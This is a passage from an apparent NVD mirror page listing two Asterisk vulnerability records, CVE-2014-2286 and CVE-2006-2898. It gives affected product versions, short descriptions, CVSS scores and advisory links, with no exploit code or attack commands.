              "matchCriteriaId": "5991814D-CA77-4C25-90D2-DB542B17E0AD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF47C9F0-D8DA-4B55-89EB-9B2C9383ADB9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "93F2B062-09B4-44F1-87E4-6104B757B557",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "F2877B09-B0B9-4AD4-906A-D40E25DDC4BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "11AAE0EA-D7EB-4341-A412-FBCDC99565A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "37F93124-25D9-44ED-B4AB-1B3552FCAB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "E4CB22F6-9F63-427C-B2D2-7ABB9B4F7694",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "758AB27B-7C40-41ED-9FC3-BE3D682EE48A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "07D3186A-CD6F-432A-8653-4CFBA37B9864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "746FB2E6-EF66-4EF3-946C-111FB7728EBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "91D933DB-06F7-45A4-A517-BFAEC82DDB7D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "3AAB500F-8F0D-4534-B659-C495D1799913",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F5C5156-CC72-4AB5-A927-E874199EBD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "AB912D4D-6BA4-4AEF-BBFD-EABFED240015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "68C78C16-3807-4272-9B46-9D9AF5150879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "02E13D3A-B37B-4215-82E0-3FCE5E35B00A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BE0F93D1-7602-47AC-9ACE-AA850D7DFD23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "956BCED3-1818-4673-A0F4-E7F03F366D99",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B58ACCC-0255-46B1-8517-EDCD85AA0F35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A921B590-57C2-4E0A-B28B-D0E48F5E1B58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "70F0AE7B-9E53-4E3B-AA9E-EAF7C4C31E1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5DE6F187-7236-4622-BD62-1E5F0742B41B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F70DDB6D-BE16-4375-87AE-E5E2B5862D17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6910E07C-3ACA-414F-B468-13E4BF9BE938",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "837A07D7-C2FD-4077-A0AD-AF2147E04B84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B2A99209-E8C5-44E6-A8DA-7FC07FBA6D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "18985B4A-4C54-4EC6-9274-15E7DCFEC94D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "48AE70AD-85BE-44DE-BC75-1690C27821B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "804F861A-81E1-45C5-A7D3-0E73770AC155",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0AE503BD-F9BD-4396-B27D-184AE06F594D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9CD9A213-27F7-410E-97B1-E7405B4FCECE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "10FFDE4F-0B30-43C3-9475-80259D5E9055",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F30E2AB-B354-4583-9D76-9DF1727407A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DBDFE57E-EEBF-4722-B6D0-147F72018DE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902A2600-49A7-4013-A621-9EE94F1E8435",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7021D54A-D443-492A-AE8C-62F2B85A1F37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B003CB5A-A95A-481F-B762-79C476829D81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84C8BB88-FBE3-4C82-9D53-E34AA7B6A73E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "F8037EB0-42FA-45BA-9E8E-D279432EC4CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "E374559C-E550-4BB9-9682-9C4535EAE9A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "FFFB7E8B-C963-4ACB-AE37-9E4938A5462E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF83EAD3-3CC1-4C1B-AAB8-0FE03BB67EC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E3F75AF0-A4E0-425E-B707-ED1F58C9CC83",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "745EC4D8-5E19-48C8-8609-11A74DC18266",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F1871DC4-AA58-4C04-9D6A-4FF383C56405",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8560DBD-A70E-4033-AE2E-96DA373AB425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E08ECE50-3A53-45C1-8BEA-8B9E024E22F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "59C2E58B-EEB3-4E8D-940C-2DF846923B19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D40F2ADC-6F79-410F-9063-1354C15F0D8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "69E55195-84CC-46DB-9E49-DEB864DF0659",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7F58B52D-9510-465F-8BFB-6896B4D36F5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "59E72AD4-90BE-4C3B-B457-31FF193712FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "81EB266E-40BC-45EA-8EDB-4766011C460B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E23FCBC3-30EF-47BC-AEFE-073E84B6DBA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5AB33EDF-29D7-4092-91FE-505B39D3E57B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4F698874-028E-410B-90FE-FDD441F55C32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "081DA344-7266-4D67-8B92-830F43B42CC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "01851B4A-F7CB-4263-B06C-92D39A693530",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BB95638-D09F-4F02-9076-49BE93F2A407",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E2DD3AF-EF01-4A1A-AF9A-98575E36D088",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "163E8F93-432A-4F68-B309-7A38AE1A30FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F53C384F-75DD-4A29-8907-BA95F08B1465",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:-:*:*:*:*:*:*",
              "matchCriteriaId": "6BB940E4-E612-4B27-9188-E794665191B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6952FFDE-92D0-4A75-AABB-113E6FAF5A31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5735354A-CF57-4A9A-9607-169CE50E0655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "38E0B2C4-55EA-4712-8E75-24A5718F9FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "832F5503-6354-4E39-B927-3BA9606A372D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "9E23AF8A-63B2-4597-8E78-A4672B0C44B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "main/http.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.x before 1.8.15-cert5 and 11.6 before 11.6-cert2, allows remote attackers to cause a denial of service (stack consumption) and possibly execute arbitrary code via an HTTP request with a large number of Cookie headers."
    },
    {
      "lang": "es",
      "value": "main/http.c en Asterisk Open Source 1.8.x anterior a 1.8.26.1, 11.8.x anterior a 11.8.1 y 12.1.x anterior a 12.1.1 y Certified Asterisk 1.8.x anterior a 1.8.15-cert5 y 11.6 anterior a 11.6-cert2, permite a atacantes remotos causar una denegaci\u00f3n de servicio (consumo de pila) y posiblemente ejecutar c\u00f3digo arbitrario a trav\u00e9s de una solicitud HTTP con un n\u00famero grande de cabeceras de cookies."
    }
  ],
  "id": "CVE-2014-2286",
  "lastModified": "2024-11-21T02:06:00.360",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-04-18T22:14:37.917",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-001.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/66093"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23340"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/66093"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23340"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-06-07 10:02

Modified

2024-11-21 00:12

Severity ?

Summary

The IAX2 channel driver (chan_iax2) for Asterisk 1.2.x before 1.2.9 and 1.0.x before 1.0.11 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via truncated IAX 2 (IAX2) video frames, which bypasses a length check and leads to a buffer overflow involving negative length check. NOTE: the vendor advisory claims that only a DoS is possible, but the original researcher is reliable.

References

URL	Tags
cve@mitre.org	http://secunia.com/advisories/20497	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/20658	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/20899	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/21222	Vendor Advisory
cve@mitre.org	http://securitytracker.com/id?1016236	Patch
cve@mitre.org	http://www.asterisk.org/node/95
cve@mitre.org	http://www.debian.org/security/2006/dsa-1126
cve@mitre.org	http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml
cve@mitre.org	http://www.novell.com/linux/security/advisories/2006_38_security.html
cve@mitre.org	http://www.securityfocus.com/archive/1/436127/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/archive/1/436671/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/18295	Patch
cve@mitre.org	http://www.vupen.com/english/advisories/2006/2181	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/27045
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/20497	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/20658	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/20899	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/21222	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1016236	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/95
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2006/dsa-1126
af854a3a-2127-422b-91ae-364da2661108	http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.novell.com/linux/security/advisories/2006_38_security.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/436127/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/436671/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/18295	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/2181	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/27045

Impacted products

Vendor	Product	Version
digium	asterisk	1.0.7
digium	asterisk	1.0.8
digium	asterisk	1.0.9
digium	asterisk	1.0.10
digium	asterisk	1.2.0_beta1
digium	asterisk	1.2.0_beta2
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "3636BB44-DF4D-40AB-8EBB-1EC5D911E4A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3B3C254-29D9-4911-89A9-AC0CD9EB13F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D8679FD-B2E5-46F6-B20C-F109B9706C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C656168D-7D6A-4E84-9196-A8B170E1F7CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The IAX2 channel driver (chan_iax2) for Asterisk 1.2.x before 1.2.9 and 1.0.x before 1.0.11 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via truncated IAX 2 (IAX2) video frames, which bypasses a length check and leads to a buffer overflow involving negative length check.  NOTE: the vendor advisory claims that only a DoS is possible, but the original researcher is reliable."
    }
  ],
  "evaluatorSolution": "This vulnerability is addressed in the following product releases:\r\nAsterisk, Asterisk, 1.2.9 \r\nAsterisk, Asterisk, 1.0.11",
  "id": "CVE-2006-2898",
  "lastModified": "2024-11-21T00:12:21.403",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-06-07T10:02:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20497"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20658"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20899"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/21222"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016236"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.asterisk.org/node/95"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2006/dsa-1126"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.novell.com/linux/security/advisories/2006_38_security.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/436127/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/436671/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/18295"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2006/2181"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27045"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20497"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20658"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20899"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/21222"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016236"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.asterisk.org/node/95"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2006/dsa-1126"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200606-15.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.novell.com/linux/security/advisories/2006_38_security.html"
